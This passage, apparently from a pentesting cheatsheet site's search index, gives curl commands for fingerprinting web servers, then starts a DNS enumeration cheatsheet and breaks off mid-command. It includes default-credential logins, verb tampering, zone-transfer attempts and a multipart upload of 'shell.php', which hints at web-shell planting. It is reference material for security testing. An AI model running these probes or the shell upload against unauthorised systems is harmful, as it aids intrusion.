\u0026#34;file=@shell.php\u0026#34; -F \u0026#34;submit=upload\u0026#34; https://target.tld/upload.php Proxy (Burp / ZAP) curl -x http://127.0.0.1:8080 -k https://target.tld/ export https_proxy=http://127.0.0.1:8080 # Per-shell proxy Useful Write-Out Format curl -s -o /dev/null -w \\ \u0026#34;code:%{http_code} size:%{size_download} time:%{time_total}s redir:%{redirect_url} \u0026#34; \\ https://target.tld/ Fingerprinting Recipes # Quick stack identification curl -sIL https://target.tld | grep -iE \u0026#39;server|x-powered-by|x-generator|x-drupal|x-aspnet\u0026#39; # Pull robots.txt + sitemap curl -s https://target.tld/robots.txt curl -s https://target.tld/sitemap.xml | head # Search response body for tech tells curl -s https://target.tld/ | grep -iE \u0026#39;wp-content|drupal|joomla|laravel|generator=\u0026#39; # Check common admin / framework paths for p in admin login wp-admin administrator phpmyadmin server-status; do printf \u0026#34;%-20s \u0026#34; \u0026#34;$p\u0026#34; curl -sk -o /dev/null -w \u0026#34;%{http_code} \u0026#34; \u0026#34;https://target.tld/$p\u0026#34; done Tips HEAD (-I) can lie or be blocked — fall back to -sI -X GET and inspect headers from a real GET. Combine -v with -o /dev/null to inspect headers without dumping a big body. --resolve beats editing /etc/hosts for one-off vhost checks. -k is for testing only; never disable cert checks in production tooling. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/curl/","summary":"\u003ch1 id=\"curl-cheatsheet-web-fingerprinting\"\u003ecurl Cheatsheet (Web Fingerprinting)\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Manual HTTP(S) requests for header inspection, banner grabbing, fingerprinting and quick endpoint testing.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"core-flags\"\u003eCore Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-I\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHEAD request (headers only)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-i\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInclude response headers in output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose (request + response, TLS info)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-vv\u003c/code\u003e / \u003ccode\u003e--trace-ascii -\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFull wire trace\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSilent (no progress meter)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-S\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow errors even with \u003ccode\u003e-s\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-L\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFollow redirects\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-k\u003c/code\u003e / \u003ccode\u003e--insecure\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIgnore TLS cert errors\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite body to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-O\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave with remote filename\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-A \u0026lt;ua\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet User-Agent\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-e \u0026lt;ref\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet Referer\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H \u0026quot;\u0026lt;hdr\u0026gt;: \u0026lt;val\u0026gt;\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-X \u0026lt;METHOD\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP method (GET, POST, PUT, DELETE, etc.)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;data\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePOST body (\u003ccode\u003eapplication/x-www-form-urlencoded\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--data-raw\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePOST body without \u003ccode\u003e@\u003c/code\u003e/\u003ccode\u003e\u0026amp;\u003c/code\u003e interpretation\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--data-binary\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePOST body as-is (preserve newlines)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-F \u0026lt;field\u0026gt;=\u0026lt;val\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMultipart form upload\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-b \u0026lt;cookie\u0026gt;\u003c/code\u003e / \u003ccode\u003e-c \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSend cookie / save cookies\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u user:pass\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-x \u0026lt;proxy\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse proxy (e.g. \u003ccode\u003ehttp://127.0.0.1:8080\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--resolve host:port:ip\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eForce DNS resolution (Host-header testing)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--max-time \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHard timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--connect-timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eConnect timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026quot;\u0026lt;format\u0026gt;\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite-out format (timings, codes)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner-grabbing--header-inspection\"\u003eBanner Grabbing / Header Inspection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -I https://target.tld \u003cspan style=\"color:#75715e\"\u003e# HEAD: server, framework, cookies\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sI https://target.tld | grep -iE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;server|x-powered-by|x-aspnet|via|set-cookie\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sIL https://target.tld \u003cspan style=\"color:#75715e\"\u003e# Follow redirects, show every hop\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v https://target.tld 2\u0026gt;\u0026amp;\u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e | grep -iE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;^\u0026lt; \u0026#39;\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# All response headers\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"verbose--tls-inspection\"\u003eVerbose / TLS Inspection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v https://target.tld \u003cspan style=\"color:#75715e\"\u003e# Cert chain, ALPN, ciphers\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -vk https://target.tld \u003cspan style=\"color:#75715e\"\u003e# Ignore cert errors\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl --trace-ascii trace.log https://target.tld \u003cspan style=\"color:#75715e\"\u003e# Full request/response dump\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v --tls-max 1.2 https://target.tld \u003cspan style=\"color:#75715e\"\u003e# Pin max TLS version\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"method--verb-tampering\"\u003eMethod / Verb Tampering\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X OPTIONS -i https://target.tld/ \u003cspan style=\"color:#75715e\"\u003e# Allowed methods\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X PUT -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;test\u0026#34;\u003c/span\u003e -i https://target.tld/file.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X DELETE -i https://target.tld/resource/1\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X TRACE -i https://target.tld/ \u003cspan style=\"color:#75715e\"\u003e# Cross-Site Tracing check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"virtual-host--host-header-testing\"\u003eVirtual Host / Host Header Testing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: dev.target.tld\u0026#34;\u003c/span\u003e http://\u0026lt;ip\u0026gt;/ -o dev.html\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sI --resolve target.tld:443:\u0026lt;ip\u0026gt; https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: admin.internal\u0026#34;\u003c/span\u003e http://\u0026lt;ip\u0026gt;/ \u003cspan style=\"color:#75715e\"\u003e# Find vhosts on shared IP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"cookies--sessions\"\u003eCookies \u0026amp; Sessions\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -c cookies.txt -b cookies.txt https://target.tld/login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -b \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;session=abcd1234\u0026#34;\u003c/span\u003e https://target.tld/dashboard\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -c - https://target.tld/ \u003cspan style=\"color:#75715e\"\u003e# Print Set-Cookie to stdout\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"authentication\"\u003eAuthentication\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -u admin:password https://target.tld/admin \u003cspan style=\"color:#75715e\"\u003e# Basic\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Authorization: Bearer \u0026lt;jwt\u0026gt;\u0026#34;\u003c/span\u003e https://api.target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl --ntlm -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;DOMAIN\\user:pass\u0026#39;\u003c/span\u003e https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl --digest -u user:pass https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"post--api-testing\"\u003ePOST / API Testing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Form data\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X POST -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;user=admin\u0026amp;pass=admin\u0026#34;\u003c/span\u003e https://target.tld/login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Raw JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X POST -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Content-Type: application/json\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;{\u0026#34;user\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;pass\u0026#34;:\u0026#34;admin\u0026#34;}\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e https://target.tld/api/login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# File from disk\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X POST -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Content-Type: application/json\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --data-binary @payload.json https://target.tld/api\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Multipart upload\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -F \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;file=@shell.php\u0026#34;\u003c/span\u003e -F \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;submit=upload\u0026#34;\u003c/span\u003e https://target.tld/upload.php\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"proxy-burp--zap\"\u003eProxy (Burp / ZAP)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -x http://127.0.0.1:8080 -k https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eexport https_proxy\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003ehttp://127.0.0.1:8080 \u003cspan style=\"color:#75715e\"\u003e# Per-shell proxy\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"useful-write-out-format\"\u003eUseful Write-Out Format\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -o /dev/null -w \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;code:%{http_code} size:%{size_download} time:%{time_total}s redir:%{redirect_url}\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"fingerprinting-recipes\"\u003eFingerprinting Recipes\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Quick stack identification\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sIL https://target.tld | grep -iE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;server|x-powered-by|x-generator|x-drupal|x-aspnet\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pull robots.txt + sitemap\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s https://target.tld/robots.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s https://target.tld/sitemap.xml | head\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Search response body for tech tells\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s https://target.tld/ | grep -iE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;wp-content|drupal|joomla|laravel|generator=\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Check common admin / framework paths\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e p in admin login wp-admin administrator phpmyadmin server-status; \u003cspan style=\"color:#66d9ef\"\u003edo\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e printf \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;%-20s \u0026#34;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e$p\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e curl -sk -o /dev/null -w \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;%{http_code}\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://target.tld/\u003c/span\u003e$p\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"tips\"\u003eTips\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHEAD (\u003ccode\u003e-I\u003c/code\u003e) can lie or be blocked — fall back to \u003ccode\u003e-sI -X GET\u003c/code\u003e and inspect headers from a real GET.\u003c/li\u003e\n\u003cli\u003eCombine \u003ccode\u003e-v\u003c/code\u003e with \u003ccode\u003e-o /dev/null\u003c/code\u003e to inspect headers without dumping a big body.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e--resolve\u003c/code\u003e beats editing \u003ccode\u003e/etc/hosts\u003c/code\u003e for one-off vhost checks.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e-k\u003c/code\u003e is for testing only; never disable cert checks in production tooling.\u003c/li\u003e\n\u003c/ul\u003e","title":"curl"},{"content":"DNS Enumeration Cheatsheet Default Port: 53 (TCP/UDP)\nKey DNS Record Types Record Description A IPv4 address AAAA IPv6 address MX Mail server NS Name server TXT Text records (SPF, DMARC, verification) CNAME Canonical name / alias SOA Start of authority PTR Reverse lookup SRV Service location Basic Lookups # host host \u0026lt;domain\u0026gt; host -t A \u0026lt;domain\u0026gt; host -t MX \u0026lt;domain\u0026gt; host -t NS \u0026lt;domain\u0026gt; host -t TXT \u0026lt;domain\u0026gt; host -t CNAME \u0026lt;domain\u0026gt; # dig dig \u0026lt;domain\u0026gt; dig \u0026lt;domain\u0026gt; ANY dig \u0026lt;domain\u0026gt; A dig \u0026lt;domain\u0026gt; MX dig \u0026lt;domain\u0026gt; NS dig \u0026lt;domain\u0026gt; TXT dig @\u0026lt;nameserver\u0026gt; \u0026lt;domain\u0026gt; ANY +noall +answer # nslookup nslookup \u0026lt;domain\u0026gt; nslookup -type=MX \u0026lt;domain\u0026gt; nslookup -type=NS \u0026lt;domain\u0026gt; Zone Transfer dig axfr @\u0026lt;nameserver\u0026gt; \u0026lt;domain\u0026gt; host -l \u0026lt;domain\u0026gt; \u0026lt;nameserver\u0026gt; fierce --domain \u0026lt;domain\u0026gt; Subdomain Enumeration # dnsenum dnsenum --dnsserver \u0026lt;ns\u0026gt; --enum -p 0 -s 0 -o output.txt -f wordlist.txt \u0026lt;domain\u0026gt; dnsenum --enum inlanefreight.htb -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r # dnsrecon dnsrecon -d \u0026lt;domain\u0026gt; -t std # Standard enumeration dnsrecon -d \u0026lt;domain\u0026gt; -t axfr # Zone transfer attempt dnsrecon -d \u0026lt;domain\u0026gt; -t brt -D wordlist.txt # Brute force subdomains # gobuster DNS mode gobuster dns -d \u0026lt;domain\u0026gt; -w 